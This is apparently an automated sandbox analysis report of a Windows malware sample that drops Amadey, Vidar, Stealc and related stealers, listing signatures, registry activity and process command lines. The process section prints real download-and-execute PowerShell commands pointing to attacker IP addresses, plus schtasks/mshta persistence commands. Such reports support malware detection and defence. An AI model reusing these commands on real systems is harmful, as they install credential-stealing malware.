Analysis Overview
SHA256
4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
Threat Level: Known bad
The file 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a was found to be: Known bad.
Malicious Activity Summary
Healer
Gcleaner family
Modifies Windows Defender notification settings
Systembc family
Vidar
Modifies Windows Defender TamperProtection settings
GCleaner
Amadey family
Detect Vidar Stealer
SystemBC
Healer family
Stealc family
Amadey
Detects Healer an antivirus disabler dropper
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender Real-time Protection settings
Stealc
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks BIOS information in registry
.NET Reactor proctector
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Identifies Wine through registry keys
Reads user/profile data of local email clients
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Windows security modification
Checks computer location settings
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Windows directory
System Location Discovery: System Language Discovery
Browser Information Discovery
Unsigned PE
Enumerates physical storage devices
Program crash
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 05:22
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 05:22
Reported
2025-03-06 05:25
Platform
win7-20250207-en
Max time kernel
89s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\dmax\rqrt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\dmax\rqrt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\dmax\rqrt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\ProgramData\dmax\rqrt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\65198a42c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\65198a42c7.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| N/A | N/A | C:\ProgramData\dmax\rqrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 668 set thread context of 2276 | N/A | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe |
| PID 1932 set thread context of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\dmax\rqrt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
"C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F0.tmp\9F1.tmp\9F2.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8
